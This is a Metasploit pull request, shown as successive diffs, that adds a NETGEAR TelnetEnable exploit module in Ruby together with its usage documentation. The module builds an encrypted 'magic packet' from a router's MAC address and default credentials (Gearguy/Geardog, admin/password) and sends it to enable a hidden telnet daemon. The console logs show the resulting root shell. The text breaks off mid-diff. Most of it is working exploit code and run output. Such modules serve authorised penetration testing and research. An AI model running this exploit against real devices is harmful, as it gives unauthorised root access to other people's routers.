### PR TITLE
Add NETGEAR TelnetEnable

### DIFF
--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -1,0 +1,47 @@
+## Intro
+
+> This module sends a magic packet to a NETGEAR device to enable telnetd. Upon successful connect, a root shell should be presented to the user.
+
+## Setup
+
+1. Buy a NETGEAR device
+
+## Usage
+
+```
+msf5 > use exploit/linux/telnet/netgear_telnetenable
+msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
+[*] exec: ping -c 1 192.168.1.1
+
+PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.38 ms
+
+--- 192.168.1.1 ping statistics ---
+1 packets transmitted, 1 received, 0% packet loss, time 0ms
+rtt min/avg/max/mdev = 1.381/1.381/1.381/0.000 ms
+msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
+[*] exec: arp -an 192.168.1.1
+
+? (192.168.1.1) at [redacted] [ether] on wlan0
+msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
+mac => [redacted]
+msf5 exploit(linux/telnet/netgear_telnetenable) > run
+
+[*] 192.168.1.1:23 - Generating magic packet
+[*] 192.168.1.1:23 - Connecting to telnetenabled
+[*] 192.168.1.1:23 - Sending magic packet
+[*] 192.168.1.1:23 - Disconnecting from telnetenabled
+[*] 192.168.1.1:23 - Waiting for telnetd
+[*] 192.168.1.1:23 - Connecting to telnetd
+[*] Found shell.
+
+id
+id
+uid=0 gid=0(root)
+# uname -a
+uname -a
+Linux (none) 2.6.36.4brcmarm+ #17 PREEMPT Thu Apr 25 10:00:48 CST 2013 armv7l unknown
+#
+```

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -1,6 +1,6 @@
 ## Intro
 
-Several models of Netgear devices hav ea hidden telnet daemon that can be
+Several models of Netgear devices have a hidden telnet daemon that can be
 enabled for remote LAN users by sending a 'magic packet' to the device. 
 Upon successful connect, a root shell should be presented to the user.
 

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -1,10 +1,32 @@
 ## Intro
 
-> This module sends a magic packet to a NETGEAR device to enable telnetd. Upon successful connect, a root shell should be presented to the user.
+Several models of Netgear devices hav ea hidden telnet daemon that can be
+enabled for remote LAN users by sending a 'magic packet' to the device. 
+Upon successful connect, a root shell should be presented to the user.
+
+There are many devices which contain this daemon, for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console)
+
+This module has been successfully tested against:
+
+ - N300 WNR2000 v3
+
 
 ## Setup
 
-1. Buy a NETGEAR device
+A MAC address is required for exploitation.  To determine the MAC address of the device:
+
+1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
+2. Get the MAC: ```arp -an [IP]```
+
+## Exploitation 
+
+1. Make sure you have a vulnerable device
+2. Start metasploit
+3. ```use exploit/linux/telnet/netgear_telnetenable```
+4. ```set rhost [IP]```
+5. ```set mac [MAC Address]```
+6. ```exploit```
+7. Enjoy a root shell!
 
 ## Usage
 

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -19,6 +19,9 @@ A MAC address is required for exploitation.  To determine the MAC address of the
 1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
 2. Get the MAC: ```arp -an [IP]```
 
+If you are the root user, you can skip this step. ARP will be leveraged
+to find the MAC address.
+
 ## Targets
 
 **0 (Automatic)**
@@ -40,21 +43,27 @@ Newer devices usually listen on UDP.
 Set this to the MAC address of the device. You can use `ping` and `arp`
 to find it.
 
+You can leave this blank if you're root.
+
 **USERNAME**
 
 If this is an older device, it'll take the value of `super_username` in
-`nvram`. `Gearguy` is usually correct.
+`nvram`, which is usually unchanged from `Gearguy`.
 
 If this is a newer device, it'll take the web UI username, which is
 usually unchanged from `admin`.
 
+You can leave this blank to use the default username.
+
 **PASSWORD**
 
 If this is an older device, it'll take the value of `super_passwd` in
-`nvram`. `Geardog` is usually correct.
+`nvram`, which is usually unchanged from `Geardog`.
 
 If this is a newer device, it'll take the web UI password, which is
 usually unchanged from `password`.
+
+You can leave this blank to use the default password.
 
 ## Exploitation 
 
@@ -62,11 +71,13 @@ usually unchanged from `password`.
 2. Start metasploit
 3. ```use exploit/linux/telnet/netgear_telnetenable```
 4. ```set rhost [IP]```
-5. ```set mac [MAC Address]```
+5. ```set mac [MAC Address]``` if not running as root
 6. ```exploit```
 7. Enjoy a root shell!
 
 ## Usage
+
+As a normal user:
 
 ```
 msf5 > use exploit/linux/telnet/netgear_telnetenable
@@ -76,11 +87,11 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
 [*] exec: ping -c 1 192.168.1.1
 
 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
-64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms
 
 --- 192.168.1.1 ping statistics ---
 1 packets transmitted, 1 received, 0% packet loss, time 0ms
-rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
+rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms
 msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
 [*] exec: arp -an 192.168.1.1
 
@@ -92,12 +103,13 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > run
 [+] 192.168.1.1:23 - Detected telnetenabled on UDP
 [+] 192.168.1.1:23 - Using creds admin:password
 [*] 192.168.1.1:23 - Generating magic packet
-[*] 192.168.1.1:23 - Connecting to telnetenabled
+[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
 [*] 192.168.1.1:23 - Sending magic packet
 [*] 192.168.1.1:23 - Disconnecting from telnetenabled
 [*] 192.168.1.1:23 - Waiting for telnetd
 [*] 192.168.1.1:23 - Connecting to telnetd
 [*] Found shell.
+[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600
 
 id
 id
@@ -108,14 +120,32 @@ Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7
 #
 ```
 
-If you've already exploited TelnetEnable, the exploit will attempt to
-connect to `telnetd` directly. This saves us from sending the magic
-packet again.
+As root:
 
 ```
-msf5 exploit(linux/telnet/netgear_telnetenable) > run
+msf5 > use exploit/linux/telnet/netgear_telnetenable
+msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+rmsf5 exploit(linux/telnet/netgear_telnetenable) > run
 
-[+] 192.168.1.1:23 - Detected telnetd on TCP
+[+] 192.168.1.1:23 - Detected telnetenabled on UDP
+[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
+[+] 192.168.1.1:23 - Found MAC address [redacted]
+[+] 192.168.1.1:23 - Using creds admin:password
+[*] 192.168.1.1:23 - Generating magic packet
+[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+[*] 192.168.1.1:23 - Sending magic packet
+[*] 192.168.1.1:23 - Disconnecting from telnetenabled
+[*] 192.168.1.1:23 - Waiting for telnetd
 [*] 192.168.1.1:23 - Connecting to telnetd
 [*] Found shell.
+[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600
+
+id
+id
+uid=0 gid=0(root)
+# uname -a
+uname -a
+Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
+#
 ```

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -8,8 +8,9 @@ There are many devices which contain this daemon, for a full list see [OpenWrt](
 
 This module has been successfully tested against:
 
- - N300 WNR2000 v3
-
+ - AC1450 in whatever version I bought it with (TCP)
+ - AC1450 latest V1.0.0.36_10.0.17 (UDP)
+ - N300 WNR2000 v3 (TCP)
 
 ## Setup
 
@@ -17,6 +18,39 @@ A MAC address is required for exploitation.  To determine the MAC address of the
 
 1. Ping the device to force an ARP lookup: ```ping -c 1 [IP]```
 2. Get the MAC: ```arp -an [IP]```
+
+## Targets
+
+**0 (TCP)**
+
+Older devices usually listen on TCP.
+
+**1 (UDP)**
+
+Newer devices usually listen on UDP.
+
+## Options
+
+**MAC**
+
+Set this to the MAC address of the device. You can use `ping` and `arp`
+to find it.
+
+**USERNAME**
+
+If this is an older device, it'll take the value of `super_username` in
+`nvram`. `Gearguy` is usually correct.
+
+If this is a newer device, it'll take the web UI username, which is
+usually unchanged from `admin`.
+
+**PASSWORD**
+
+If this is an older device, it'll take the value of `super_passwd` in
+`nvram`. `Geardog` is usually correct.
+
+If this is a newer device, it'll take the web UI password, which is
+usually unchanged from `password`.
 
 ## Exploitation 
 

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -56,10 +56,6 @@ If this is an older device, it'll take the value of `super_passwd` in
 If this is a newer device, it'll take the web UI password, which is
 usually unchanged from `password`.
 
-**VERBOSE**
-
-This will display the username and password used in the magic packet.
-
 ## Exploitation 
 
 1. Make sure you have a vulnerable device
@@ -91,12 +87,10 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
 ? (192.168.1.1) at [redacted] [ether] on wlan0
 msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
 mac => [redacted]
-msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
-verbose => true
 msf5 exploit(linux/telnet/netgear_telnetenable) > run
 
 [+] 192.168.1.1:23 - Detected telnetenabled on UDP
-[*] 192.168.1.1:23 - Using creds admin:password
+[+] 192.168.1.1:23 - Using creds admin:password
 [*] 192.168.1.1:23 - Generating magic packet
 [*] 192.168.1.1:23 - Connecting to telnetenabled
 [*] 192.168.1.1:23 - Sending magic packet

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -113,3 +113,15 @@ uname -a
 Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
 #
 ```
+
+If you've already exploited TelnetEnable, the exploit will attempt to
+connect to `telnetd` directly. This saves us from sending the magic
+packet again.
+
+```
+msf5 exploit(linux/telnet/netgear_telnetenable) > run
+
+[+] 192.168.1.1:23 - Detected telnetd on TCP
+[*] 192.168.1.1:23 - Connecting to telnetd
+[*] Found shell.
+```

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -10,7 +10,7 @@ This module has been successfully tested against:
 
  - AC1450 in whatever version I bought it with (TCP)
  - AC1450 latest V1.0.0.36_10.0.17 (UDP)
- - N300 WNR2000 v3 (TCP)
+ - N300 WNR2000 v3 V1.1.2.10 (TCP)
 
 ## Setup
 

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -56,6 +56,10 @@ If this is an older device, it'll take the value of `super_passwd` in
 If this is a newer device, it'll take the web UI password, which is
 usually unchanged from `password`.
 
+**VERBOSE**
+
+This will display the username and password used in the magic packet.
+
 ## Exploitation 
 
 1. Make sure you have a vulnerable device
@@ -76,20 +80,23 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
 [*] exec: ping -c 1 192.168.1.1
 
 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
-64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.40 ms
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms
 
 --- 192.168.1.1 ping statistics ---
 1 packets transmitted, 1 received, 0% packet loss, time 0ms
-rtt min/avg/max/mdev = 1.408/1.408/1.408/0.000 ms
+rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
 msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
 [*] exec: arp -an 192.168.1.1
 
 ? (192.168.1.1) at [redacted] [ether] on wlan0
 msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
 mac => [redacted]
+msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
+verbose => true
 msf5 exploit(linux/telnet/netgear_telnetenable) > run
 
 [+] 192.168.1.1:23 - Detected telnetenabled on UDP
+[*] 192.168.1.1:23 - Using creds admin:password
 [*] 192.168.1.1:23 - Generating magic packet
 [*] 192.168.1.1:23 - Connecting to telnetenabled
 [*] 192.168.1.1:23 - Sending magic packet

--- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
+++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
@@ -21,11 +21,15 @@ A MAC address is required for exploitation.  To determine the MAC address of the
 
 ## Targets
 
-**0 (TCP)**
+**0 (Automatic)**
+
+Detect if a device listens on TCP or UDP.
+
+**1 (TCP)**
 
 Older devices usually listen on TCP.
 
-**1 (UDP)**
+**2 (UDP)**
 
 Newer devices usually listen on UDP.
 
@@ -72,11 +76,11 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
 [*] exec: ping -c 1 192.168.1.1
 
 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
-64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.38 ms
+64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.40 ms
 
 --- 192.168.1.1 ping statistics ---
 1 packets transmitted, 1 received, 0% packet loss, time 0ms
-rtt min/avg/max/mdev = 1.381/1.381/1.381/0.000 ms
+rtt min/avg/max/mdev = 1.408/1.408/1.408/0.000 ms
 msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
 [*] exec: arp -an 192.168.1.1
 
@@ -85,6 +89,7 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
 mac => [redacted]
 msf5 exploit(linux/telnet/netgear_telnetenable) > run
 
+[+] 192.168.1.1:23 - Detected telnetenabled on UDP
 [*] 192.168.1.1:23 - Generating magic packet
 [*] 192.168.1.1:23 - Connecting to telnetenabled
 [*] 192.168.1.1:23 - Sending magic packet
@@ -98,6 +103,6 @@ id
 uid=0 gid=0(root)
 # uname -a
 uname -a
-Linux (none) 2.6.36.4brcmarm+ #17 PREEMPT Thu Apr 25 10:00:48 CST 2013 armv7l unknown
+Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
 #
 ```

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -55,6 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Generate the magic packet
+    print_status('Generating magic packet')
     payload = magic_packet(
       datastore['MAC'],
       datastore['USERNAME'],
@@ -63,16 +64,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Send the magic packet via TCP or UDP
     begin
+      print_status('Connecting to telnetenabled')
       target[:proto] == :tcp ? connect : connect_udp
+      print_status('Sending magic packet')
       target[:proto] == :tcp ? sock.put(payload) : udp_sock.put(payload)
     ensure
+      print_status('Disconnecting from telnetenabled')
       target[:proto] == :tcp ? disconnect : disconnect_udp
     end
 
     # Wait a couple seconds for telnetd to come up
+    print_status('Waiting for telnetd')
     sleep(2)
 
     # Connect to telnetd via TCP
+    print_status('Connecting to telnetd')
     connect
     handler(sock)
   end

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'               => 'NETGEAR TelnetEnable',
+      'Description'        => %q{
+        This module sends a magic packet to a NETGEAR device to enable telnetd.
+        Upon successful connect, a root shell should be presented to the user.
+      },
+      'Author'             => [
+        'Paul Gebheim', # Python PoC (TCP)
+        'insanid',      # Python PoC (UDP)
+        'wvu',          # Metasploit module
+      ],
+      'References'         => [
+        ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
+        ['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
+        ['URL', 'https://github.com/insanid/netgear-telenetenable']
+      ],
+      'DisclosureDate'     => 'Oct 30 2009', # Python PoC (TCP)
+      'License'            => MSF_LICENSE,
+      'Platform'           => 'unix',
+      'Arch'               => ARCH_CMD,
+      'Privileged'         => true,
+      'Payload'            => {
+        'Compat'           => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'Targets'            => [
+        ['TCP (typically older devices)', proto: :tcp],
+        ['UDP (typically newer devices)', proto: :udp]
+      ],
+      'DefaultTarget'      => 0
+    ))
+
+    register_options([
+      Opt::RPORT(23),
+      OptString.new('MAC',      [true, 'MAC address of device']),
+      OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
+      OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
+    ])
+  end
+
+  def exploit
+    # Generate the magic packet
+    payload = magic_packet(
+      datastore['MAC'],
+      datastore['USERNAME'],
+      datastore['PASSWORD']
+    )
+
+    # Send the magic packet via TCP or UDP
+    begin
+      target[:proto] == :tcp ? connect : connect_udp
+      target[:proto] == :tcp ? sock.put(payload) : udp_sock.put(payload)
+    ensure
+      target[:proto] == :tcp ? disconnect : disconnect_udp
+    end
+
+    # Wait a couple seconds for telnetd to come up
+    sleep(2)
+
+    # Connect to telnetd via TCP
+    connect
+    handler(sock)
+  end
+
+  # NOTE: This is almost a verbatim copy of the Python PoC
+  def magic_packet(mac, username, password)
+    mac = mac.gsub(/[:-]/, '').upcase
+
+    if mac.length != 12
+      fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
+    end
+    just_mac = mac.ljust(0x10, "\x00")
+
+    if username.length > 0x10
+      fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
+    end
+    just_username = username.ljust(0x10, "\x00")
+
+    if target[:proto] == :tcp
+      if password.length > 0x10
+        fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
+      end
+      just_password = password.ljust(0x10, "\x00")
+    elsif target[:proto] == :udp
+      # Thanks to Roberto Frenna for the reserved field analysis
+      if password.length > 0x21
+        fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
+      end
+      just_password = password.ljust(0x21, "\x00")
+    end
+
+    cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
+    md5_key = Rex::Text.md5_raw(cleartext)
+
+    payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))
+
+    secret_key = 'AMBIT_TELNET_ENABLE+' + password
+
+    byte_swap(blowfish_encrypt(secret_key, payload))
+  end
+
+  def blowfish_encrypt(secret_key, payload)
+    cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
+
+    cipher.padding = 0
+    cipher.key_len = secret_key.length
+    cipher.key     = secret_key
+
+    cipher.update(payload) + cipher.final
+  end
+
+  def byte_swap(data)
+    data.unpack('N*').pack('V*')
+  end
+
+end

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -69,11 +69,21 @@ class MetasploitModule < Msf::Exploit::Remote
     @username = datastore['USERNAME'] || target[:username]
     @password = datastore['PASSWORD'] || target[:password]
 
+    # Try to do the exploit unless telnetd is found
+    do_exploit = true
+
     # Detect TCP or UDP
     if @proto == :auto
       begin
         connect
-        print_good('Detected telnetenabled or telnetd on TCP')
+
+        if sock.get_once.length == 0
+          print_good('Detected telnetenabled on TCP')
+        else
+          print_good('Detected telnetd on TCP')
+          do_exploit = false
+        end
+
         @proto = :tcp
       rescue Rex::ConnectionError
         print_good('Detected telnetenabled on UDP')
@@ -91,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Shell it
-    exploit_telnetenabled
+    exploit_telnetenabled if do_exploit
     connect_telnetd
   end
 
@@ -110,13 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('Disconnecting from telnetenabled')
       @proto == :tcp ? disconnect : disconnect_udp
     end
-  end
 
-  def connect_telnetd
     # Wait a couple seconds for telnetd to come up
     print_status('Waiting for telnetd')
     sleep(2)
+  end
 
+  def connect_telnetd
     # Connect to telnetd via TCP
     print_status('Connecting to telnetd')
     connect

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -39,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       },
       'Targets'            => [
+        ['Automatic (detect TCP or UDP)', proto: :auto],
         ['TCP (typically older devices)', proto: :tcp],
         ['UDP (typically newer devices)', proto: :udp]
       ],
@@ -54,6 +55,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    @proto = target[:proto]
+
+    # Detect TCP or UDP
+    if @proto == :auto
+      begin
+        connect
+        print_good('Detected telnetenabled or telnetd on TCP')
+        @proto = :tcp
+      rescue Rex::ConnectionError
+        print_good('Detected telnetenabled on UDP')
+        @proto = :udp
+      ensure
+        disconnect
+      end
+    end
+
+    # Shell it
+    exploit_telnetenabled
+    connect_telnetd
+  end
+
+  def exploit_telnetenabled
     # Generate the magic packet
     print_status('Generating magic packet')
     payload = magic_packet(
@@ -65,14 +88,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send the magic packet via TCP or UDP
     begin
       print_status('Connecting to telnetenabled')
-      target[:proto] == :tcp ? connect : connect_udp
+      @proto == :tcp ? connect : connect_udp
       print_status('Sending magic packet')
-      target[:proto] == :tcp ? sock.put(payload) : udp_sock.put(payload)
+      @proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
     ensure
       print_status('Disconnecting from telnetenabled')
-      target[:proto] == :tcp ? disconnect : disconnect_udp
+      @proto == :tcp ? disconnect : disconnect_udp
     end
+  end
 
+  def connect_telnetd
     # Wait a couple seconds for telnetd to come up
     print_status('Waiting for telnetd')
     sleep(2)
@@ -97,12 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     just_username = username.ljust(0x10, "\x00")
 
-    if target[:proto] == :tcp
+    if @proto == :tcp
       if password.length > 0x10
         fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
       end
       just_password = password.ljust(0x10, "\x00")
-    elsif target[:proto] == :udp
+    elsif @proto == :udp
       # Thanks to Roberto Frenna for the reserved field analysis
       if password.length > 0x21
         fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -65,66 +65,73 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @proto    = target[:proto]
+    # Try to do the exploit unless telnetd is detected
+    @do_exploit = true
+
+    # Detect TCP or UDP and presence of telnetd
+    @proto = target[:proto]
+    detect_proto if @proto == :auto
+
+    # Use supplied or default creds
+    configure_creds if @do_exploit
+
+    # Shell it
+    exploit_telnetenabled if @do_exploit
+    connect_telnetd
+  end
+
+  def detect_proto
+    begin
+      connect
+
+      res = begin
+        sock.get_once || ''
+      rescue EOFError
+        ''
+      end
+
+      # telnetenabled returns no data, unlike telnetd
+      if res.length == 0
+        print_good('Detected telnetenabled on TCP')
+      else
+        print_good('Detected telnetd on TCP')
+        @do_exploit = false
+      end
+
+      @proto = :tcp
+    rescue Rex::ConnectionError
+      print_good('Detected telnetenabled on UDP')
+      @proto = :udp
+    ensure
+      disconnect
+    end
+  end
+
+  def configure_creds
     @username = datastore['USERNAME'] || target[:username]
     @password = datastore['PASSWORD'] || target[:password]
 
-    # Try to do the exploit unless telnetd is found
-    do_exploit = true
-
-    # Detect TCP or UDP
-    if @proto == :auto
-      begin
-        connect
-
-        res = begin
-          sock.get_once || ''
-        rescue EOFError
-          ''
-        end
-
-        if res.length == 0
-          print_good('Detected telnetenabled on TCP')
-        else
-          print_good('Detected telnetd on TCP')
-          do_exploit = false
-        end
-
-        @proto = :tcp
-      rescue Rex::ConnectionError
-        print_good('Detected telnetenabled on UDP')
-        @proto = :udp
-      ensure
-        disconnect
-      end
-    end
-
-    # Try to use default creds
+    # Try to use default creds if no creds were found
     unless @username && @password
       tgt = targets.find { |t| t[:proto] == @proto }
       @username = tgt[:username]
       @password = tgt[:password]
     end
 
-    # Tell the user what creds we chose
-    vprint_status("Using creds #{@username}:#{@password}") if do_exploit
-
-    # Shell it
-    exploit_telnetenabled if do_exploit
-    connect_telnetd
+    print_good("Using creds #{@username}:#{@password}")
   end
 
   def exploit_telnetenabled
-    # Generate the magic packet
     print_status('Generating magic packet')
     payload = magic_packet(datastore['MAC'], @username, @password)
 
-    # Send the magic packet via TCP or UDP
     begin
-      print_status('Connecting to telnetenabled')
+      print_status("Connecting to telnetenabled via #{@proto.upcase}")
       @proto == :tcp ? connect : connect_udp
       print_status('Sending magic packet')
       @proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
+    rescue Rex::ConnectionError
+      fail_with(Failure::Disconnected, 'Something happened mid-connection!')
     ensure
       print_status('Disconnecting from telnetenabled')
       @proto == :tcp ? disconnect : disconnect_udp
@@ -136,7 +143,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def connect_telnetd
-    # Connect to telnetd via TCP
     print_status('Connecting to telnetd')
     connect
     handler(sock)

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       },
       'Targets'            => [
-        ['Automatic (detect TCP or UDP)', proto: :auto],
-        ['TCP (typically older devices)', proto: :tcp],
-        ['UDP (typically newer devices)', proto: :udp]
+        ['Automatic (detect TCP or UDP)',
+          proto:    :auto
+        ],
+        ['TCP (typically older devices)',
+          proto:    :tcp,
+          username: 'Gearguy',
+          password: 'Geardog'
+        ],
+        ['UDP (typically newer devices)',
+          proto:    :udp,
+          username: 'admin',
+          password: 'password'
+        ]
       ],
       'DefaultTarget'      => 0
     ))
@@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       Opt::RPORT(23),
       OptString.new('MAC',      [true, 'MAC address of device']),
-      OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
-      OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
+      OptString.new('USERNAME', [false, 'Username on device']),
+      OptString.new('PASSWORD', [false, 'Password on device'])
     ])
   end
 
   def exploit
-    @proto = target[:proto]
+    @proto    = target[:proto]
+    @username = datastore['USERNAME'] || target[:username]
+    @password = datastore['PASSWORD'] || target[:password]
 
     # Detect TCP or UDP
     if @proto == :auto
@@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
+    # Try to use default creds
+    unless @username && @password
+      tgt = targets.find { |t| t[:proto] == @proto }
+      @username = tgt[:username]
+      @password = tgt[:password]
+    end
+
     # Shell it
     exploit_telnetenabled
     connect_telnetd
@@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit_telnetenabled
     # Generate the magic packet
     print_status('Generating magic packet')
-    payload = magic_packet(
-      datastore['MAC'],
-      datastore['USERNAME'],
-      datastore['PASSWORD']
-    )
+    payload = magic_packet(datastore['MAC'], @username, @password)
 
     # Send the magic packet via TCP or UDP
     begin

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -64,6 +64,18 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def check
+    # Run through protocol detection
+    detect_proto
+
+    # This is a gamble, but it's the closest we can get
+    if @proto == :tcp
+      CheckCode::Detected
+    else
+      CheckCode::Unknown
+    end
+  end
+
   def exploit
     # Try to do the exploit unless telnetd is detected
     @do_exploit = true
@@ -99,6 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       @proto = :tcp
+    # It's UDP... and we may not get an ICMP error...
     rescue Rex::ConnectionError
       print_good('Detected telnetenabled on UDP')
       @proto = :udp

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Udp
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Capture
 
   def initialize(info = {})
     super(update_info(info,
@@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       Opt::RPORT(23),
-      OptString.new('MAC',      [true, 'MAC address of device']),
+      OptString.new('MAC',      [false, 'MAC address of device']),
       OptString.new('USERNAME', [false, 'Username on device']),
       OptString.new('PASSWORD', [false, 'Password on device'])
     ])
@@ -83,6 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
